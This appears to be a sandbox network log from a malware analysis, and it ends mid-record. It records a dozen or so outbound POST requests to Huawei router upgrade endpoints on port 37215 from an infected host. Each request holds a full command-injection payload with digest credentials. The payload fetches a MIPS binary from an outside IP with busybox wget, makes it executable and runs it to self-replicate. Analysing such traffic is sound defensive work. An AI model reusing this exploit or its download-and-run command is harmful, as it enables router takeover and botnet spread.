6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  103192.168.2.1344534157.26.133.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062247038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  104192.168.2.1337698154.249.187.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062258005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  105192.168.2.1356600157.45.54.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062262058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  106192.168.2.13365328.235.190.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062274933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  107192.168.2.1347824197.22.65.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062274933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  108192.168.2.134972441.73.1.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062274933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  109192.168.2.135168860.92.146.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062283039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  110192.168.2.133520241.131.13.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062371969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  111192.168.2.1336704197.155.216.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062371969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  112192.168.2.1339150197.93.159.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062397957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  113192.168.2.1339790197.43.75.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062397957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
